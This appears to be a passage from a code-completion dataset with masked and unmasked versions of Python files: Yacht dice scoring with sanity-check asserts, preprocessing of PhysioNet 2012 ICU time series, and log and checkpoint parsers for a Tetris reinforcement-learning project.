if category is Category.FOUR_OF_A_KIND:
four_die = [d for d, c in die_counts.items() if c >= 4]
return four_die[0] * 4 if four_die else 0
| null | [
0,
2,
3,
4
] |
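Note on record 625: the expected behaviour of score() follows directly from its branches; a few sanity checks, assuming the record's Category and score definitions are in scope:

assert score([5, 5, 5, 5, 5], Category.YACHT) == 50           # all dice equal
assert score([2, 3, 4, 5, 6], Category.BIG_STRAIGHT) == 30    # five distinct, no 1
assert score([2, 2, 3, 3, 3], Category.FULL_HOUSE) == 13      # 2+2+3+3+3
assert score([6, 6, 6, 6, 2], Category.FOUR_OF_A_KIND) == 24  # 6 * 4
assert score([1, 2, 3, 4, 5], Category.THREES) == 3           # sum of the threes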
626 | 3e07a2a2d0a810c016720fa41d71d0771cbccfef | <mask token>
def inv_list(l, start=0):
d = {}
for i in range(len(l)):
d[l[i]] = i + start
return d
<mask token>
def read_dataset(d):
ts = []
pbar = tqdm(os.listdir(raw_data_path + '/set-' + d), desc=
'Reading time series set ' + d)
for f in pbar:
data = pd.read_csv(raw_data_path + '/set-' + d + '/' + f).iloc[1:]
data = data.loc[data.Parameter.notna()]
if len(data) <= 5:
continue
data = data.loc[data.Value >= 0]
data['RecordID'] = f[:-4]
ts.append(data)
ts = pd.concat(ts)
return ts
<mask token>
| <mask token>
def inv_list(l, start=0):
d = {}
for i in range(len(l)):
d[l[i]] = i + start
return d
<mask token>
def read_dataset(d):
ts = []
pbar = tqdm(os.listdir(raw_data_path + '/set-' + d), desc=
'Reading time series set ' + d)
for f in pbar:
data = pd.read_csv(raw_data_path + '/set-' + d + '/' + f).iloc[1:]
data = data.loc[data.Parameter.notna()]
if len(data) <= 5:
continue
data = data.loc[data.Value >= 0]
data['RecordID'] = f[:-4]
ts.append(data)
ts = pd.concat(ts)
return ts
<mask token>
ts.rename(columns={'Time': 'hour', 'Parameter': 'variable', 'Value':
'value'}, inplace=True)
<mask token>
oc.rename(columns={'Length_of_stay': 'length_of_stay', 'In-hospital_death':
'in_hospital_mortality'}, inplace=True)
<mask token>
ts.drop(columns='RecordID', inplace=True)
oc.drop(columns='RecordID', inplace=True)
<mask token>
for val in [4, 3, 2, 1]:
kk = ii & (ts.value == val)
ts.loc[kk, 'variable'] = 'ICUType_' + str(val)
<mask token>
np.random.seed(123)
np.random.shuffle(train_valid_ind)
<mask token>
oc.drop(columns='subset', inplace=True)
pickle.dump([ts, oc, train_ind, valid_ind, test_ind], open(
'physionet_2012_preprocessed.pkl', 'wb'))
| <mask token>
def inv_list(l, start=0):
d = {}
for i in range(len(l)):
d[l[i]] = i + start
return d
raw_data_path = '/home/reddy/sindhu/datasets/physionet_2012/'
def read_dataset(d):
ts = []
pbar = tqdm(os.listdir(raw_data_path + '/set-' + d), desc=
'Reading time series set ' + d)
for f in pbar:
data = pd.read_csv(raw_data_path + '/set-' + d + '/' + f).iloc[1:]
data = data.loc[data.Parameter.notna()]
if len(data) <= 5:
continue
data = data.loc[data.Value >= 0]
data['RecordID'] = f[:-4]
ts.append(data)
ts = pd.concat(ts)
return ts
ts = pd.concat((read_dataset('a'), read_dataset('b'), read_dataset('c')))
ts.Time = ts.Time.apply(lambda x: int(x[:2]) + int(x[3:]) / 60)
ts.rename(columns={'Time': 'hour', 'Parameter': 'variable', 'Value':
'value'}, inplace=True)
oc_a = pd.read_csv(raw_data_path + '/Outcomes-a.txt', usecols=['RecordID',
'Length_of_stay', 'In-hospital_death'])
oc_a['subset'] = 'a'
oc_b = pd.read_csv(raw_data_path + '/Outcomes-b.txt', usecols=['RecordID',
'Length_of_stay', 'In-hospital_death'])
oc_b['subset'] = 'b'
oc_c = pd.read_csv(raw_data_path + '/Outcomes-c.txt', usecols=['RecordID',
'Length_of_stay', 'In-hospital_death'])
oc_c['subset'] = 'c'
oc = pd.concat((oc_a, oc_b, oc_c))
oc.RecordID = oc.RecordID.astype(str)
oc.rename(columns={'Length_of_stay': 'length_of_stay', 'In-hospital_death':
'in_hospital_mortality'}, inplace=True)
rec_ids = sorted(list(ts.RecordID.unique()))
rid_to_ind = inv_list(rec_ids)
oc = oc.loc[oc.RecordID.isin(rec_ids)]
ts['ts_ind'] = ts.RecordID.map(rid_to_ind)
oc['ts_ind'] = oc.RecordID.map(rid_to_ind)
ts.drop(columns='RecordID', inplace=True)
oc.drop(columns='RecordID', inplace=True)
ts = ts.drop_duplicates()
ii = ts.variable == 'ICUType'
for val in [4, 3, 2, 1]:
kk = ii & (ts.value == val)
ts.loc[kk, 'variable'] = 'ICUType_' + str(val)
ts.loc[ii, 'value'] = 1
means_stds = ts.groupby('variable').agg({'value': ['mean', 'std']})
means_stds.columns = [col[1] for col in means_stds.columns]
means_stds.loc[means_stds['std'] == 0, 'std'] = 1
ts = ts.merge(means_stds.reset_index(), on='variable', how='left')
ii = ts.variable.apply(lambda x: not x.startswith('ICUType')
) & ~ts.variable.isin(['Age', 'Gender', 'Height'])
ts.loc[ii, 'value'] = (ts.loc[ii, 'value'] - ts.loc[ii, 'mean']) / ts.loc[
ii, 'std']
train_valid_ind = np.array(oc.loc[oc.subset != 'a'].ts_ind)
np.random.seed(123)
np.random.shuffle(train_valid_ind)
bp = int(0.8 * len(train_valid_ind))
train_ind = train_valid_ind[:bp]
valid_ind = train_valid_ind[bp:]
test_ind = np.array(oc.loc[oc.subset == 'a'].ts_ind)
oc.drop(columns='subset', inplace=True)
pickle.dump([ts, oc, train_ind, valid_ind, test_ind], open(
'physionet_2012_preprocessed.pkl', 'wb'))
| from tqdm import tqdm
import os
import pandas as pd
import pickle
import numpy as np
def inv_list(l, start=0):
d = {}
for i in range(len(l)):
d[l[i]] = i + start
return d
raw_data_path = '/home/reddy/sindhu/datasets/physionet_2012/'
def read_dataset(d):
ts = []
pbar = tqdm(os.listdir(raw_data_path + '/set-' + d), desc=
'Reading time series set ' + d)
for f in pbar:
data = pd.read_csv(raw_data_path + '/set-' + d + '/' + f).iloc[1:]
data = data.loc[data.Parameter.notna()]
if len(data) <= 5:
continue
data = data.loc[data.Value >= 0]
data['RecordID'] = f[:-4]
ts.append(data)
ts = pd.concat(ts)
return ts
ts = pd.concat((read_dataset('a'), read_dataset('b'), read_dataset('c')))
ts.Time = ts.Time.apply(lambda x: int(x[:2]) + int(x[3:]) / 60)
ts.rename(columns={'Time': 'hour', 'Parameter': 'variable', 'Value':
'value'}, inplace=True)
oc_a = pd.read_csv(raw_data_path + '/Outcomes-a.txt', usecols=['RecordID',
'Length_of_stay', 'In-hospital_death'])
oc_a['subset'] = 'a'
oc_b = pd.read_csv(raw_data_path + '/Outcomes-b.txt', usecols=['RecordID',
'Length_of_stay', 'In-hospital_death'])
oc_b['subset'] = 'b'
oc_c = pd.read_csv(raw_data_path + '/Outcomes-c.txt', usecols=['RecordID',
'Length_of_stay', 'In-hospital_death'])
oc_c['subset'] = 'c'
oc = pd.concat((oc_a, oc_b, oc_c))
oc.RecordID = oc.RecordID.astype(str)
oc.rename(columns={'Length_of_stay': 'length_of_stay', 'In-hospital_death':
'in_hospital_mortality'}, inplace=True)
rec_ids = sorted(list(ts.RecordID.unique()))
rid_to_ind = inv_list(rec_ids)
oc = oc.loc[oc.RecordID.isin(rec_ids)]
ts['ts_ind'] = ts.RecordID.map(rid_to_ind)
oc['ts_ind'] = oc.RecordID.map(rid_to_ind)
ts.drop(columns='RecordID', inplace=True)
oc.drop(columns='RecordID', inplace=True)
ts = ts.drop_duplicates()
ii = ts.variable == 'ICUType'
for val in [4, 3, 2, 1]:
kk = ii & (ts.value == val)
ts.loc[kk, 'variable'] = 'ICUType_' + str(val)
ts.loc[ii, 'value'] = 1
means_stds = ts.groupby('variable').agg({'value': ['mean', 'std']})
means_stds.columns = [col[1] for col in means_stds.columns]
means_stds.loc[means_stds['std'] == 0, 'std'] = 1
ts = ts.merge(means_stds.reset_index(), on='variable', how='left')
ii = ts.variable.apply(lambda x: not x.startswith('ICUType')
) & ~ts.variable.isin(['Age', 'Gender', 'Height'])
ts.loc[ii, 'value'] = (ts.loc[ii, 'value'] - ts.loc[ii, 'mean']) / ts.loc[
ii, 'std']
train_valid_ind = np.array(oc.loc[oc.subset != 'a'].ts_ind)
np.random.seed(123)
np.random.shuffle(train_valid_ind)
bp = int(0.8 * len(train_valid_ind))
train_ind = train_valid_ind[:bp]
valid_ind = train_valid_ind[bp:]
test_ind = np.array(oc.loc[oc.subset == 'a'].ts_ind)
oc.drop(columns='subset', inplace=True)
pickle.dump([ts, oc, train_ind, valid_ind, test_ind], open(
'physionet_2012_preprocessed.pkl', 'wb'))
| from tqdm import tqdm
import os
import pandas as pd
import pickle
import numpy as np
def inv_list(l, start=0):
d = {}
for i in range(len(l)):
d[l[i]] = i+start
return d
raw_data_path = '/home/reddy/sindhu/datasets/physionet_2012/'
def read_dataset(d):
ts = []
pbar = tqdm(os.listdir(raw_data_path+'/set-'+d), desc='Reading time series set '+d)
for f in pbar:
data = pd.read_csv(raw_data_path+'/set-'+d+'/'+f).iloc[1:]
data = data.loc[data.Parameter.notna()]
if len(data)<=5:
continue
data = data.loc[data.Value>=0] # neg Value indicates missingness.
data['RecordID'] = f[:-4]
ts.append(data)
ts = pd.concat(ts)
return ts
ts = pd.concat((read_dataset('a'), read_dataset('b'), read_dataset('c')))
ts.Time = ts.Time.apply(lambda x:int(x[:2])+int(x[3:])/60) # No. of hours since admission.
ts.rename(columns={'Time':'hour', 'Parameter':'variable', 'Value':'value'}, inplace=True)
oc_a = pd.read_csv(raw_data_path+'/Outcomes-a.txt', usecols=['RecordID', 'Length_of_stay', 'In-hospital_death'])
oc_a['subset'] = 'a'
oc_b = pd.read_csv(raw_data_path+'/Outcomes-b.txt', usecols=['RecordID', 'Length_of_stay', 'In-hospital_death'])
oc_b['subset'] = 'b'
oc_c = pd.read_csv(raw_data_path+'/Outcomes-c.txt', usecols=['RecordID', 'Length_of_stay', 'In-hospital_death'])
oc_c['subset'] = 'c'
oc = pd.concat((oc_a,oc_b,oc_c))
oc.RecordID = oc.RecordID.astype(str)
oc.rename(columns={'Length_of_stay':'length_of_stay', 'In-hospital_death':'in_hospital_mortality'}, inplace=True)
rec_ids = sorted(list(ts.RecordID.unique()))
rid_to_ind = inv_list(rec_ids)
oc = oc.loc[oc.RecordID.isin(rec_ids)]
ts['ts_ind'] = ts.RecordID.map(rid_to_ind)
oc['ts_ind'] = oc.RecordID.map(rid_to_ind)
ts.drop(columns='RecordID', inplace=True)
oc.drop(columns='RecordID', inplace=True)
# Drop duplicates.
ts = ts.drop_duplicates()
# Convert categorical to numeric.
ii = (ts.variable=='ICUType')
for val in [4,3,2,1]:
kk = ii&(ts.value==val)
ts.loc[kk, 'variable'] = 'ICUType_'+str(val)
ts.loc[ii, 'value'] = 1
# Normalize data except Age, Gender, Height, ICUType.
means_stds = ts.groupby('variable').agg({'value':['mean', 'std']})
means_stds.columns = [col[1] for col in means_stds.columns]
means_stds.loc[means_stds['std']==0, 'std'] = 1
ts = ts.merge(means_stds.reset_index(), on='variable', how='left')
ii = ts.variable.apply(lambda x:not(x.startswith('ICUType')))&(~ts.variable.isin(['Age', 'Gender', 'Height']))
ts.loc[ii, 'value'] = (ts.loc[ii, 'value']-ts.loc[ii, 'mean'])/ts.loc[ii, 'std']
# Generate split.
train_valid_ind = np.array(oc.loc[oc.subset!='a'].ts_ind)
np.random.seed(123)
np.random.shuffle(train_valid_ind)
bp = int(0.8*len(train_valid_ind))
train_ind = train_valid_ind[:bp]
valid_ind = train_valid_ind[bp:]
test_ind = np.array(oc.loc[oc.subset=='a'].ts_ind)
oc.drop(columns='subset', inplace=True)
# Store data.
pickle.dump([ts, oc, train_ind, valid_ind, test_ind], open('physionet_2012_preprocessed.pkl','wb'))
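# A minimal sketch of reading the file produced above; the unpacking order
# simply mirrors the pickle.dump call:
#     import pickle
#     with open('physionet_2012_preprocessed.pkl', 'rb') as f:
#         ts, oc, train_ind, valid_ind, test_ind = pickle.load(f)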
| [
2,
3,
4,
5,
6
] |
627 | 3668e8009dca4ea261bdfbd325331c338fdac5a9 | <mask token>
class StatusParser:
def __init__(self):
self.board = np.memmap('../tmp/board', mode='r', dtype=np.int8,
shape=(20, 10))
self.combo = np.memmap('../tmp/combo', mode='r', dtype=np.int32,
shape=(1,))
self.lines = np.memmap('../tmp/lines', mode='r', dtype=np.int32,
shape=(1,))
self.score = np.memmap('../tmp/score', mode='r', dtype=np.int32,
shape=(1,))
        self.line_stats = np.memmap('../tmp/line_stats', mode='r',
            dtype=np.int32, shape=(4,))
class Parser:
def __init__(self, filename):
self.filename = filename
self.last_update = -1
def check_update(self):
latest_update = os.path.getmtime(self.filename)
if latest_update > self.last_update:
self.last_update = latest_update
self.parse()
return True
return False
def parse(self):
score_re = (
'Episode:\\s*(?P<episode>\\d*)\\s*Score:\\s*(?P<score>\\d*)\\s*Lines Cleared:\\s*(?P<lines>\\d*)'
)
train_re = (
'Iteration:\\s*(?P<iter>\\d*)\\s*training loss:\\s*(?P<t_loss>\\d*\\.\\d*)\\s*validation loss:\\s*(?P<v_loss>\\d*\\.\\d*)±\\s*(?P<v_loss_err>\\d*\\.\\d*|nan)\\s*gradient norm:\\s*(?P<g_norm>\\d*\\.\\d*)'
)
datasize_re = (
'Training data size:\\s*(?P<tsize>\\d*)\\s*Validation data size:\\s*(?P<vsize>\\d*)'
)
queue_re = 'Memory usage: (?P<filled>\\d*) / (?P<size>\\d*).*'
self.data = defaultdict(list)
size = 0
filled = 0
rm_since_last_game = 0
with open(self.filename) as f:
lc_avg_tmp = []
sc_avg_tmp = []
data_accum = 0
training = False
for line in f.readlines():
match_score_re = re.search(score_re, line)
match_train_re = re.search(train_re, line)
match_datasize_re = re.search(datasize_re, line)
match_queue_re = re.search(queue_re, line)
if match_score_re:
d = match_score_re.groupdict()
lc = int(d['lines'])
sc = int(d['score'])
self.data['line_cleared'].append(lc)
self.data['score'].append(sc)
self.data['data_accumulated'].append(data_accum)
lc_avg_tmp.append(lc)
sc_avg_tmp.append(sc)
rm_since_last_game = 0
elif match_train_re:
d = match_train_re.groupdict()
self.data['training_loss'].append(float(d['t_loss']))
self.data['validation_loss'].append(float(d['v_loss']))
if d['v_loss_err'] == 'nan':
self.data['validation_loss_err'].append(0)
else:
self.data['validation_loss_err'].append(float(d[
'v_loss_err']))
self.data['g_norm'].append(float(d['g_norm']))
elif match_datasize_re:
d = match_datasize_re.groupdict()
tsize = int(d['tsize'])
vsize = int(d['vsize'])
data_accum += tsize + vsize
elif match_queue_re:
d = match_queue_re.groupdict()
filled = int(d['filled'])
size = int(d['size'])
elif 'REMOVING UNUSED' in line:
rm_since_last_game += 1
elif 'proceed to training' in line:
training = True
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
lc_avg_tmp.clear()
elif self.data['line_cleared_per_train']:
self.data['line_cleared_per_train'].append(self.
data['line_cleared_per_train'][-1])
else:
self.data['line_cleared_per_train'].append((0, 0))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
sc_avg_tmp.clear()
elif self.data['score_per_train']:
self.data['score_per_train'].append(self.data[
'score_per_train'][-1])
else:
self.data['score_per_train'].append((0, 0))
elif 'Training complete' in line:
training = False
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
if not training:
flocal = './model_checkpoint'
ftarget = '../pytorch_model/model_checkpoint'
ex_local = os.path.isfile(flocal)
ex_target = os.path.isfile(ftarget)
if ex_target and (ex_local and not filecmp.cmp(flocal,
ftarget) or not ex_local):
copyfile(ftarget, flocal)
self.data['filled'] = filled
self.data['size'] = size
self.data['rm_since_last_game'] = rm_since_last_game
class ModelParser:
def __init__(self, distributional=True):
self.last_update = -1
self.data = {}
self.distributional = distributional
def check_update(self):
flocal = './model_checkpoint'
if os.path.isfile(flocal):
latest = os.path.getmtime(flocal)
if latest > self.last_update:
print('New model found, updating...', flush=True)
self.last_update = latest
state = torch.load(flocal, map_location=torch.device('cpu'))
model_state = state['model_state_dict']
self.parse_state(model_state)
return True
return False
def parse(self, model):
self.parse_state(model.state_dict())
def parse_state(self, model_state):
self.data = {}
for k, v in model_state.items():
if 'weight' in k:
k = k.replace('.weight', '')
k = k.replace('seq.', '')
self.data[k] = v.cpu().numpy().ravel()
| <mask token>
class BoardParser:
<mask token>
<mask token>
class StatusParser:
def __init__(self):
self.board = np.memmap('../tmp/board', mode='r', dtype=np.int8,
shape=(20, 10))
self.combo = np.memmap('../tmp/combo', mode='r', dtype=np.int32,
shape=(1,))
self.lines = np.memmap('../tmp/lines', mode='r', dtype=np.int32,
shape=(1,))
self.score = np.memmap('../tmp/score', mode='r', dtype=np.int32,
shape=(1,))
        self.line_stats = np.memmap('../tmp/line_stats', mode='r',
            dtype=np.int32, shape=(4,))
class Parser:
def __init__(self, filename):
self.filename = filename
self.last_update = -1
def check_update(self):
latest_update = os.path.getmtime(self.filename)
if latest_update > self.last_update:
self.last_update = latest_update
self.parse()
return True
return False
def parse(self):
score_re = (
'Episode:\\s*(?P<episode>\\d*)\\s*Score:\\s*(?P<score>\\d*)\\s*Lines Cleared:\\s*(?P<lines>\\d*)'
)
train_re = (
'Iteration:\\s*(?P<iter>\\d*)\\s*training loss:\\s*(?P<t_loss>\\d*\\.\\d*)\\s*validation loss:\\s*(?P<v_loss>\\d*\\.\\d*)±\\s*(?P<v_loss_err>\\d*\\.\\d*|nan)\\s*gradient norm:\\s*(?P<g_norm>\\d*\\.\\d*)'
)
datasize_re = (
'Training data size:\\s*(?P<tsize>\\d*)\\s*Validation data size:\\s*(?P<vsize>\\d*)'
)
queue_re = 'Memory usage: (?P<filled>\\d*) / (?P<size>\\d*).*'
self.data = defaultdict(list)
size = 0
filled = 0
rm_since_last_game = 0
with open(self.filename) as f:
lc_avg_tmp = []
sc_avg_tmp = []
data_accum = 0
training = False
for line in f.readlines():
match_score_re = re.search(score_re, line)
match_train_re = re.search(train_re, line)
match_datasize_re = re.search(datasize_re, line)
match_queue_re = re.search(queue_re, line)
if match_score_re:
d = match_score_re.groupdict()
lc = int(d['lines'])
sc = int(d['score'])
self.data['line_cleared'].append(lc)
self.data['score'].append(sc)
self.data['data_accumulated'].append(data_accum)
lc_avg_tmp.append(lc)
sc_avg_tmp.append(sc)
rm_since_last_game = 0
elif match_train_re:
d = match_train_re.groupdict()
self.data['training_loss'].append(float(d['t_loss']))
self.data['validation_loss'].append(float(d['v_loss']))
if d['v_loss_err'] == 'nan':
self.data['validation_loss_err'].append(0)
else:
self.data['validation_loss_err'].append(float(d[
'v_loss_err']))
self.data['g_norm'].append(float(d['g_norm']))
elif match_datasize_re:
d = match_datasize_re.groupdict()
tsize = int(d['tsize'])
vsize = int(d['vsize'])
data_accum += tsize + vsize
elif match_queue_re:
d = match_queue_re.groupdict()
filled = int(d['filled'])
size = int(d['size'])
elif 'REMOVING UNUSED' in line:
rm_since_last_game += 1
elif 'proceed to training' in line:
training = True
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
lc_avg_tmp.clear()
elif self.data['line_cleared_per_train']:
self.data['line_cleared_per_train'].append(self.
data['line_cleared_per_train'][-1])
else:
self.data['line_cleared_per_train'].append((0, 0))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
sc_avg_tmp.clear()
elif self.data['score_per_train']:
self.data['score_per_train'].append(self.data[
'score_per_train'][-1])
else:
self.data['score_per_train'].append((0, 0))
elif 'Training complete' in line:
training = False
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
if not training:
flocal = './model_checkpoint'
ftarget = '../pytorch_model/model_checkpoint'
ex_local = os.path.isfile(flocal)
ex_target = os.path.isfile(ftarget)
if ex_target and (ex_local and not filecmp.cmp(flocal,
ftarget) or not ex_local):
copyfile(ftarget, flocal)
self.data['filled'] = filled
self.data['size'] = size
self.data['rm_since_last_game'] = rm_since_last_game
class ModelParser:
def __init__(self, distributional=True):
self.last_update = -1
self.data = {}
self.distributional = distributional
def check_update(self):
flocal = './model_checkpoint'
if os.path.isfile(flocal):
latest = os.path.getmtime(flocal)
if latest > self.last_update:
print('New model found, updating...', flush=True)
self.last_update = latest
state = torch.load(flocal, map_location=torch.device('cpu'))
model_state = state['model_state_dict']
self.parse_state(model_state)
return True
return False
def parse(self, model):
self.parse_state(model.state_dict())
def parse_state(self, model_state):
self.data = {}
for k, v in model_state.items():
if 'weight' in k:
k = k.replace('.weight', '')
k = k.replace('seq.', '')
self.data[k] = v.cpu().numpy().ravel()
| <mask token>
class BoardParser:
<mask token>
def update(self):
s = self.file.read()
if len(s) == 200:
self.data = np.fromstring(s, dtype=np.int8).reshape(20, 10)
self.file.seek(0)
class StatusParser:
def __init__(self):
self.board = np.memmap('../tmp/board', mode='r', dtype=np.int8,
shape=(20, 10))
self.combo = np.memmap('../tmp/combo', mode='r', dtype=np.int32,
shape=(1,))
self.lines = np.memmap('../tmp/lines', mode='r', dtype=np.int32,
shape=(1,))
self.score = np.memmap('../tmp/score', mode='r', dtype=np.int32,
shape=(1,))
        self.line_stats = np.memmap('../tmp/line_stats', mode='r',
            dtype=np.int32, shape=(4,))
class Parser:
def __init__(self, filename):
self.filename = filename
self.last_update = -1
def check_update(self):
latest_update = os.path.getmtime(self.filename)
if latest_update > self.last_update:
self.last_update = latest_update
self.parse()
return True
return False
def parse(self):
score_re = (
'Episode:\\s*(?P<episode>\\d*)\\s*Score:\\s*(?P<score>\\d*)\\s*Lines Cleared:\\s*(?P<lines>\\d*)'
)
train_re = (
'Iteration:\\s*(?P<iter>\\d*)\\s*training loss:\\s*(?P<t_loss>\\d*\\.\\d*)\\s*validation loss:\\s*(?P<v_loss>\\d*\\.\\d*)±\\s*(?P<v_loss_err>\\d*\\.\\d*|nan)\\s*gradient norm:\\s*(?P<g_norm>\\d*\\.\\d*)'
)
datasize_re = (
'Training data size:\\s*(?P<tsize>\\d*)\\s*Validation data size:\\s*(?P<vsize>\\d*)'
)
queue_re = 'Memory usage: (?P<filled>\\d*) / (?P<size>\\d*).*'
self.data = defaultdict(list)
size = 0
filled = 0
rm_since_last_game = 0
with open(self.filename) as f:
lc_avg_tmp = []
sc_avg_tmp = []
data_accum = 0
training = False
for line in f.readlines():
match_score_re = re.search(score_re, line)
match_train_re = re.search(train_re, line)
match_datasize_re = re.search(datasize_re, line)
match_queue_re = re.search(queue_re, line)
if match_score_re:
d = match_score_re.groupdict()
lc = int(d['lines'])
sc = int(d['score'])
self.data['line_cleared'].append(lc)
self.data['score'].append(sc)
self.data['data_accumulated'].append(data_accum)
lc_avg_tmp.append(lc)
sc_avg_tmp.append(sc)
rm_since_last_game = 0
elif match_train_re:
d = match_train_re.groupdict()
self.data['training_loss'].append(float(d['t_loss']))
self.data['validation_loss'].append(float(d['v_loss']))
if d['v_loss_err'] == 'nan':
self.data['validation_loss_err'].append(0)
else:
self.data['validation_loss_err'].append(float(d[
'v_loss_err']))
self.data['g_norm'].append(float(d['g_norm']))
elif match_datasize_re:
d = match_datasize_re.groupdict()
tsize = int(d['tsize'])
vsize = int(d['vsize'])
data_accum += tsize + vsize
elif match_queue_re:
d = match_queue_re.groupdict()
filled = int(d['filled'])
size = int(d['size'])
elif 'REMOVING UNUSED' in line:
rm_since_last_game += 1
elif 'proceed to training' in line:
training = True
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
lc_avg_tmp.clear()
elif self.data['line_cleared_per_train']:
self.data['line_cleared_per_train'].append(self.
data['line_cleared_per_train'][-1])
else:
self.data['line_cleared_per_train'].append((0, 0))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
sc_avg_tmp.clear()
elif self.data['score_per_train']:
self.data['score_per_train'].append(self.data[
'score_per_train'][-1])
else:
self.data['score_per_train'].append((0, 0))
elif 'Training complete' in line:
training = False
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
if not training:
flocal = './model_checkpoint'
ftarget = '../pytorch_model/model_checkpoint'
ex_local = os.path.isfile(flocal)
ex_target = os.path.isfile(ftarget)
if ex_target and (ex_local and not filecmp.cmp(flocal,
ftarget) or not ex_local):
copyfile(ftarget, flocal)
self.data['filled'] = filled
self.data['size'] = size
self.data['rm_since_last_game'] = rm_since_last_game
class ModelParser:
def __init__(self, distributional=True):
self.last_update = -1
self.data = {}
self.distributional = distributional
def check_update(self):
flocal = './model_checkpoint'
if os.path.isfile(flocal):
latest = os.path.getmtime(flocal)
if latest > self.last_update:
print('New model found, updating...', flush=True)
self.last_update = latest
state = torch.load(flocal, map_location=torch.device('cpu'))
model_state = state['model_state_dict']
self.parse_state(model_state)
return True
return False
def parse(self, model):
self.parse_state(model.state_dict())
def parse_state(self, model_state):
self.data = {}
for k, v in model_state.items():
if 'weight' in k:
k = k.replace('.weight', '')
k = k.replace('seq.', '')
self.data[k] = v.cpu().numpy().ravel()
| <mask token>
sys.path.append('../')
class BoardParser:
def __init__(self):
self.file = open('../board_output', 'rb')
self.data = None
def update(self):
s = self.file.read()
if len(s) == 200:
self.data = np.fromstring(s, dtype=np.int8).reshape(20, 10)
self.file.seek(0)
class StatusParser:
def __init__(self):
self.board = np.memmap('../tmp/board', mode='r', dtype=np.int8,
shape=(20, 10))
self.combo = np.memmap('../tmp/combo', mode='r', dtype=np.int32,
shape=(1,))
self.lines = np.memmap('../tmp/lines', mode='r', dtype=np.int32,
shape=(1,))
self.score = np.memmap('../tmp/score', mode='r', dtype=np.int32,
shape=(1,))
        self.line_stats = np.memmap('../tmp/line_stats', mode='r',
            dtype=np.int32, shape=(4,))
class Parser:
def __init__(self, filename):
self.filename = filename
self.last_update = -1
def check_update(self):
latest_update = os.path.getmtime(self.filename)
if latest_update > self.last_update:
self.last_update = latest_update
self.parse()
return True
return False
def parse(self):
score_re = (
'Episode:\\s*(?P<episode>\\d*)\\s*Score:\\s*(?P<score>\\d*)\\s*Lines Cleared:\\s*(?P<lines>\\d*)'
)
train_re = (
'Iteration:\\s*(?P<iter>\\d*)\\s*training loss:\\s*(?P<t_loss>\\d*\\.\\d*)\\s*validation loss:\\s*(?P<v_loss>\\d*\\.\\d*)±\\s*(?P<v_loss_err>\\d*\\.\\d*|nan)\\s*gradient norm:\\s*(?P<g_norm>\\d*\\.\\d*)'
)
datasize_re = (
'Training data size:\\s*(?P<tsize>\\d*)\\s*Validation data size:\\s*(?P<vsize>\\d*)'
)
queue_re = 'Memory usage: (?P<filled>\\d*) / (?P<size>\\d*).*'
self.data = defaultdict(list)
size = 0
filled = 0
rm_since_last_game = 0
with open(self.filename) as f:
lc_avg_tmp = []
sc_avg_tmp = []
data_accum = 0
training = False
for line in f.readlines():
match_score_re = re.search(score_re, line)
match_train_re = re.search(train_re, line)
match_datasize_re = re.search(datasize_re, line)
match_queue_re = re.search(queue_re, line)
if match_score_re:
d = match_score_re.groupdict()
lc = int(d['lines'])
sc = int(d['score'])
self.data['line_cleared'].append(lc)
self.data['score'].append(sc)
self.data['data_accumulated'].append(data_accum)
lc_avg_tmp.append(lc)
sc_avg_tmp.append(sc)
rm_since_last_game = 0
elif match_train_re:
d = match_train_re.groupdict()
self.data['training_loss'].append(float(d['t_loss']))
self.data['validation_loss'].append(float(d['v_loss']))
if d['v_loss_err'] == 'nan':
self.data['validation_loss_err'].append(0)
else:
self.data['validation_loss_err'].append(float(d[
'v_loss_err']))
self.data['g_norm'].append(float(d['g_norm']))
elif match_datasize_re:
d = match_datasize_re.groupdict()
tsize = int(d['tsize'])
vsize = int(d['vsize'])
data_accum += tsize + vsize
elif match_queue_re:
d = match_queue_re.groupdict()
filled = int(d['filled'])
size = int(d['size'])
elif 'REMOVING UNUSED' in line:
rm_since_last_game += 1
elif 'proceed to training' in line:
training = True
if lc_avg_tmp:
mean = np.average(lc_avg_tmp)
std = np.std(lc_avg_tmp) / np.sqrt(len(lc_avg_tmp))
self.data['line_cleared_per_train'].append((mean, std))
lc_avg_tmp.clear()
elif self.data['line_cleared_per_train']:
self.data['line_cleared_per_train'].append(self.
data['line_cleared_per_train'][-1])
else:
self.data['line_cleared_per_train'].append((0, 0))
if sc_avg_tmp:
mean = np.average(sc_avg_tmp)
std = np.std(sc_avg_tmp) / np.sqrt(len(sc_avg_tmp))
self.data['score_per_train'].append((mean, std))
sc_avg_tmp.clear()
elif self.data['score_per_train']:
self.data['score_per_train'].append(self.data[
